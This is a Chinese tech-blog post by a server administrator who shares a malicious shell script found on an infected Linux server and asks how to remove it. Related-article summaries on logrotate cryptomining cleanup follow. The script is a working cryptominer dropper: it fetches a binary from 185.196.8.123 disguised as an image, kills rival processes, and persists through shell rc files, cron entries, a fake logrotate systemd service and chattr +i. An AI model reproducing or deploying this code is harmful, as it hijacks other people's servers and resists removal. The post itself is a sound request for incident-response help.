【已解决】服务器中病毒了,哪位安全方面的大神来给看看,急!急!急!

最新推荐文章于 2025-06-01 21:21:01 发布
最新推荐文章于 2025-06-01 21:21:01 发布
阅读量467 收藏 7
点赞数 4
文章标签: 服务器 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shark1357/article/details/140166466
版权

【已解决】

看来这个病毒刚被发现不就,有遇到同样问题的同学请在评论区留言,我告诉你怎么解决O(∩_∩)O

=================

这是一段病毒脚本,哪位大神给解读下,要怎么清理掉它呢?

现在是文件删不掉,进程杀不掉

#!/bin/sh
{ pkill -f xmrig || kill -9 $(pgrep -f 'xmrig'); } >/dev/null 2>&1
ps -eo pid,%cpu,comm --sort=-%cpu | awk 'NR>1 && !/awk|ps/ && !($3 ~ /^(logrotate|sshd|java)$/) && int($2) > 60 { system("kill -9 " $1) }'
EXEC="source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)"
trap 'rm -- "$0"' EXIT
if [ -z "${HOME+x}" ]; then
   export HOME=/tmp
fi
mkdir -p "$HOME/.config" >/dev/null 2>&1
[ ! -f "$HOME/.config/logrotate" ] && { 
   ARCH=$(uname -m)
   URL=""
   [ "$ARCH" = "x86_64" ] && URL="http://185.196.8.123/silicon64blueprints.png"
   [ "$ARCH" = "aarch64" ] && URL="http://185.196.8.123/siliconarmblueprints.png"
   [ -z "$URL" ] && URL="http://185.196.8.123/silicon64blueprints.png"
   { wget -q -O "$HOME/.config/logrotate" "$URL" || curl -sL -o "$HOME/.config/logrotate" "$URL"; } >/dev/null 2>&1
   chmod +x "$HOME/.config/logrotate" >/dev/null 2>&1
}
pgrep -f "config/logrotate" >/dev/null 2>&1 || "$HOME/.config/logrotate"
add_to_startup() {
   if [ -r "$1" ]; then
       if ! grep -Fxq "$EXEC >/dev/null 2>&1" "$1"; then
           echo "$EXEC >/dev/null 2>&1" >> "$1"
       fi
   fi
}
case "$(ps -p $$ -o comm=)" in
   bash) add_to_startup "$HOME/.bashrc"
         add_to_startup "$HOME/.bash_logout" ;;
   zsh) add_to_startup "$HOME/.zshrc" ;;
esac
[ "$(id -u)" -eq 0 ] && {
   RCLOCAL=''
   [ -e /etc/debian_version ] && RCLOCAL='/etc/rc.local'
   [ -e /etc/centos-release -o -e /etc/redhat-release ] && RCLOCAL='/etc/rc.d/rc.local'
   [ -n "$RCLOCAL" ] && add_to_startup "$RCLOCAL"
   cat >/etc/systemd/system/logrotate.service <<EOL
[Unit]
Description=The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files
[Service]
ExecStart=$HOME/.config/logrotate
Restart=always
Nice=-20
StandardOutput=null
[Install]
WantedBy=multi-user.target
EOL
   sudo systemctl daemon-reload 2>/dev/null
   sudo systemctl enable logrotate.service 2>/dev/null
   [ -d /var/spool/cron ] && [ -f /var/spool/cron/root ] && echo "@daily $EXEC" >> /var/spool/cron/root 2>/dev/null
   [ -d /var/spool/cron/crontabs ] && [ -f /var/spool/cron/crontabs/root ] && echo "@daily $EXEC" >> /var/spool/cron/crontabs/root 2>/dev/null
   [ -f /etc/crontab ] && echo "@daily $EXEC" >> /etc/crontab 2>/dev/null && sudo chattr +i /etc/crontab 2>/dev/null
   [ -d /etc/cron.hourly ] && echo "$EXEC" >> /etc/cron.hourly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.hourly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.hourly/logrotate 2>/dev/null
   [ -d /etc/cron.daily ] && echo "$EXEC" >> /etc/cron.daily/logrotate 2>/dev/null && sudo chmod +x /etc/cron.daily/logrotate 2>/dev/null && sudo chattr +i /etc/cron.daily/logrotate 2>/dev/null
   [ -d /etc/cron.weekly ] && echo "$EXEC" >> /etc/cron.weekly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.weekly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.weekly/logrotate 2>/dev/null
   [ -d /etc/cron.monthly ] && echo "$EXEC" >> /etc/cron.monthly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.monthly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.monthly/logrotate 2>/dev/null
   [ -d /etc/cron.yearly ] && echo "$EXEC" >> /etc/cron.yearly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.yearly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.yearly/logrotate 2>/dev/null
}
shark1357
关注
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
记一次服务器被入侵(木马,挖矿)的排查过程
诺浅的专栏
01-05 5805
阿里云安全中心报告了告警信息,同时手机短信、邮件、电话也接收到了来自阿里云的风险通知,感觉这方面阿里云还是不错。
【已解决】挖矿病毒 logrotate 185.196.8.123
07-08 1707
如果你最近也中了这个病毒,看这篇文章就对了。 网上找了几篇类似文章,都是教你杀进程、删文件,但新版的病毒已经进化了,进程杀死复活,文件删掉又有了... 经过本人几天的尝试,最终找到了干掉他的方法。 先确定下你的症状是不是跟我一样? 问题现象:Shell登录慢,logrorateCPU占用高,这个进程的文件路径为:/root/.config/logrotate,删掉又重新生成。 使用find /...
linux服务器被入侵,出现@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://118
qq_45621643的博客
04-10 1251
toptop。
记录服务器被(logrotate)木马入侵事件
XT4625的专栏
07-29 969
重启通过用户模式进入,查看进程发现有个定时任务一直在自动创建并执行(进程ID一直在变化,而且占满CPU,杀死之后马上又复活了,重启也一样),怀疑被入侵了。更改reids 默认端口和密码,升级nacos,然后我们的业务不需要用到境外IP,所以干脆就直接禁用境外IP。后面反馈运营商排查入侵原因,可能是通过 redis 默认端口或者nacos 漏洞。背景:发现平时正常登录的服务器突然进不去,也没明细的错误,重启也登录不了!清除木马程序和所有crontab 异常计划后,重置服务器密码,重启服务器
logrotate挖矿病毒处理
seds19841231的专栏
12-13 516
logrotate挖矿病毒处理过程记录,希望对大家有个借鉴作用
小白怎么入门网络安全?看这篇就够啦!
热门推荐
xuanyuan_fsx的专栏
09-04 5万+
由于我之前写了不少网络安全技术相关的故事文章,不少读者朋友知道我是从事网络安全相关的工作,于是经常有人在微信里问我: 我刚入门网络安全,该怎么学?要学哪些东西?有哪些方向?怎么选? 不同于Java、C/C++等后端开发岗位有非常明晰的学习路线,网路安全更多是靠自己摸索,要学的东西又杂又多,难成体系。 常读我文章的朋友知道,我的文章基本以故事为载体的技术输出为主,很少去谈到职场、面试这些方面的内容。主要是考虑到现在大家的压力已经很大,节奏很快,公众号上是让大家放松的地方,尽量写一些轻快的内容。不
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
Linux 自带神器 logrotate 详解.doc
08-24
Linux 自带神器 logrotate 详解.doc
进行病毒查杀/5月服务器遭遇logrotate病毒的查杀过程_0基础信息安全教学
2401_84915584的博客
05-29 1504
现象:SSH失败、CPU满转五一回来第一天早上,同事反馈服务器ssh登录不上,一直处于登录中状态。于是进入云服务器控制台,CPU打满状态
阿里云服务器被通知存在“挖矿”行为,请及时整改
ywanju的博客
04-04 1380
挖矿”行为是违f 的,一般如果不是自己操作的话,那就是被别人攻击了,利用漏洞在你的服务器上面安装了木马之类的东西。早晨被通知阿里云服务器存在挖矿行为,请及时整改,不然服务器被收回。
二次记录服务器被(logrotate)木马入侵事件
XT4625的专栏
09-25 1955
还试图将此脚本插入各种系统级cron目录和systemd服务中,以确保它持续运行或定期检查,这有效地使其更难以移除,并确保它定期运行。使在此模式下和正常启动的系统差别不大以root身份运行,拥有最高权限可以对所有文件读写,只是不需要输入root密码,所以就可以实现强制更改密码。设置了一个名为logrotate.service的systemd服务来运行下载的二进制文件,并尝试将执行命令添加到不同频率的各种cron目录(每小时、每天、每周、每月、每年)中,并使用chattr +i命令使这些脚本变为不可更改。
记录一次清理挖矿病毒
fsckzyly的博客
03-10 57
背景 新接手了个环境,同事交接时说这些机器中过挖矿病毒还没重装,我TM。。。 线上环境不好动,只能手动查杀了。 操作系统如下: [root@k8s-node7 ~]# cat /etc/redhat-release CentOS Linux release 7.5.1804 (Core) 过程 ssh上去,ps -ef看到如下: 手动kill掉进程,很快会生成新的,猜测有守护进程。用STOP信...
服务器数据恢复—EMC存储raid5阵列故障导致上层应用崩了的数据恢复案例
beiya123的博客
05-29 383
4、使用北亚企安自主开发的文件解释程序对导出的lun进行文件系统解释。1、将存储中的所有硬盘编号后取出,以只读方式进行全盘镜像,在镜像过程中观察掉线硬盘是否存在物理故障和坏道。2、在镜像文件上分析所有硬盘的底层数据,获取到原存储中raid5阵列的硬盘盘序,raid条带大小、raid阵列信息等重组raid所需要的相关信息,根据这些信息重组raid。3、重组完成后分析LUN在RAID中的分配信息和LUN分配的数据块MAP。根据上述信息,使用北亚企安自主开发的程序解释LUN的数据MAP并导出LUN的所有数据。
python集成inotify-rsync实现跨服务器文件同步
最新发布
alex1801
06-01 468
摘要:本文介绍了一个基于Python watchdog库与rsync命令的文件同步监控工具。该系统通过watchdog监控源目录的文件变更(创建/修改/删除/移动),将变更收集到待处理队列,并设置1秒延迟合并多次操作。采用rsync实现增量同步,支持--delete保持目录一致性和--exclude排除特定文件。环境准备包括安装rsync/watchdog及配置SSH免密登录。核心代码展示了事件处理、命令构建和同步执行逻辑,提供初始同步选项,实现了高效可靠的自动化文件同步方案。(149字)
压测服务器和线上环境的区别
m0_46322965的博客
05-29 451
在进行服务器压测时,测试环境与线上环境的差异会直接影响测试结果的可靠性。
Linux中的权限概念
f040731_007的博客
05-28 962
Linux系统的介绍及操作系统的基本概念Linux基本指令(保姆级教学)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值